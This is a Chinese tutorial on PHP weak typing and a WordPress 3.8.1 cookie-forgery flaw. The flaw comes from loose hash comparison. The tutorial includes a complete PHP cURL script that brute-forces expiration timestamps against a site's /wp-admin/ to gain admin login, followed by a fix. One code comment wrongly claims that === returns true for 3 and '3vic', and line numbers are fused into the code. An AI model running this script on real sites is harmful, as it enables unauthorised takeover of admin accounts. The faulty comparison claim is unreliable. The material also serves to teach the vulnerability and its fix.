PHP是弱類型語言,所以變數會因為使用情境的不同自動進行類型轉換。PHP中用 == 以及 != 進行相等判斷時,會自動進行類型轉換,用 === 以及 !== 進行判斷時不會自動轉換類型。
1 php2$a = 3;3$b = '3vic';4var_dump($a == $b);//true5var_dump($a != $b);//false6var_dump($a === $b);//true7var_dump($a !== $b);//false8 ?>
說明:在PHP中字串轉換成整型時,如果是數字開頭就會轉換成前面的數字('3vic' -> 3),如果不是數字開頭,那麼就會轉換成0('vic' -> 0)
2 WordPress代碼
1 php2// WordPress 3.8.13if ($hmac != $hash) {}4// WordPress 3.8.25if ( hash_hmac('md5', $hmac, $key) !== hash_hmac('md5', $hash, $key) ) {}6 ?>
用戶端後台只驗證其中的一條Cookie,如下所示
wordpress_c47f4a97d0321c1980bb76fc00d1e78f=admin|1433403595|cf50f3b50eed94dd0fdc3d3ea2c7bbb; path=/wp-admin; domain=www.test.ichunqiu; HttpOnly
其中Cookie名 wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91 格式為 wordpress_ + md5(siteurl) 其中siteurl為WordPress的網址,此處網站地址為http://www.test.ichunqiu,md5加密後為c47f4a97d0321c1980bb76fc00d1e78f,其它部分也可省。
類型 使用者名稱 到期時間 登入成功伺服器端賦予用戶端的hash值
| 對應變數 | $username | $expiration | $hmac |
| cookies | admin | 1433403595 | cf50f3b50eed94dd0fdc3d3ea2c7bbb |
代碼 wp-includes/pluggable.php 第543-549行
1 php2$key = wp_hash($username . $pass_frag . '|' . $expiration, $scheme);3$hash = hash_hmac('md5', $username . '|' . $expiration, $key);4if ( $hmac != $hash ) {5 do_action('auth_cookie_bad_hash', $cookie_elements);6returnfalse;7 }
在代碼所使用的變數中,通過改變用戶端Cookie 的方式可控的有 $username 使用者名稱,$expiration 有效期間,又因為其中使用者名稱是固定的,因此只有$expiration是可控的,所以我們可以從改變 $expiration 的方法來改變$hash。
有以下幾種可能使$hmac == $hash 為真,字串完全相等或者 $hmac 等於0的同時 $hash為以字元開頭的字串; 將用戶端的Cookie中 $hmac 值改為0,然後在if ( $hmac != $hash ) {的上面一行寫入var_dump($hmac);die();發現列印出來 $hmac 的結果是 string '0'而不是int 0, 那麼有沒有方法使字串識別為整數呢,代碼如下:
1 php2var_dump('0' == '0e156464513131');//true
其中的 0e156464513131 會被識別為0乘以10的156464513131次方,還是得0;因此當 $hash 以0e開頭後面全是數字時就會與 $hmac的值為 '0' 時相等,所以我們可以將用戶端的Cookie設定為類似 wordpress_c47f4a97d0321c1980bb76fc00d1e78f=admin|1433403595|0 然後不斷更新到期時間(現在1433403595的位置)的方法來碰撞伺服器端,一旦 $hash 的值為0e開頭後面全是數字即可驗證通過。假設碰撞成功,就修改瀏覽器的Cookie,直接存取後台地址,就可以成功登陸後台。
3 測試指令碼
通過改變用戶端Cookie裡到期時間的值,不斷嘗試登入後台,找出可以進入背景時間戳記,從而實現Cookie偽造登入後台。
1 php 2/* 3 4本指令碼用於WordPress 3.8.1 的cookie偽造漏洞檢測 5傳入兩個值 6 WordPress 的首頁 $host 7 管理使用者名 $root 8*/ 9header("Content-type:text/html;charset=utf-8");1011$host = 'http://xxx.xxx.xxx';//首頁地址 結尾不帶'/'12$root = 'user';//管理使用者名1314$url = $host.'/wp-admin/';//後台管理地址 15$sitehash=md5($host); 1617echo "\nWelcome\n\n";18//通過時間戳記暴力破解cookie 實現偽造cookie19for($i=1500000000;$i<1600000000;$i++){20$cookie = "wordpress_".$sitehash."=".$root."|".$i."|0;";//組合構造cookie21$header = array(22 "Content-Type:application/x-www-form-urlencoded",23 'User-Agent: Mozilla/4.0 (compatible; MSIE .0; Windows NT 6.1; Trident/4.0; SLCC2;)',24 "Cookie:".$cookie,25 );2627$curl = curl_init(); // 啟動一個CURL會話 28 curl_setopt($curl, CURLOPT_URL, $url); // 要訪問的地址29 curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); // 使用自動跳轉 30 curl_setopt($curl, CURLOPT_AUTOREFERER, 1); // 自動化佈建Referer 31 curl_setopt($curl, CURLOPT_HTTPGET, true); // 發送一個常規的Post請求 32 curl_setopt($curl, CURLOPT_HTTPHEADER, $header); // 讀取上面所儲存的Cookie資訊 33 curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); // 擷取的資訊以檔案流的形式返回 34 curl_setopt($curl, CURLOPT_HEADER, false);35 curl_setopt($curl, CURLOPT_HEADER, 0); 36 curl_setopt($curl, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);//讓curl自動選擇版本37$tmpInfo = curl_exec($curl); // 執行操作38if (curl_errno($curl)) { 39echo 'Errno'.curl_error($curl); 40 } 41 curl_close($curl); // 關閉CURL會話4243 //匹配結果44if(strstr($tmpInfo,'我們準備了幾個連結供您開始')){45echo "\n".'success : '.$cookie."\n\n";46break;47 }else{48echo 'fail : '.$cookie."\n";49 }5051 }52 ?>
說明:理論上32位的MD5值以0e開頭的大概三億分之一,碰撞到可以利用的 $expiration 幾率極低。
5 修複方案
PHP 中使用的雜湊比較函數,將其中的 == , != 分別更改為 === 和 !== 或者 將比較的兩個變數使用MD5再加密一次。
學習筆記:http://ichunqiu.com/course/167
以上就介紹了PHP弱類型:WordPress Cookie偽造,包括了方面的內容,希望對PHP教程有興趣的朋友有所協助。
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
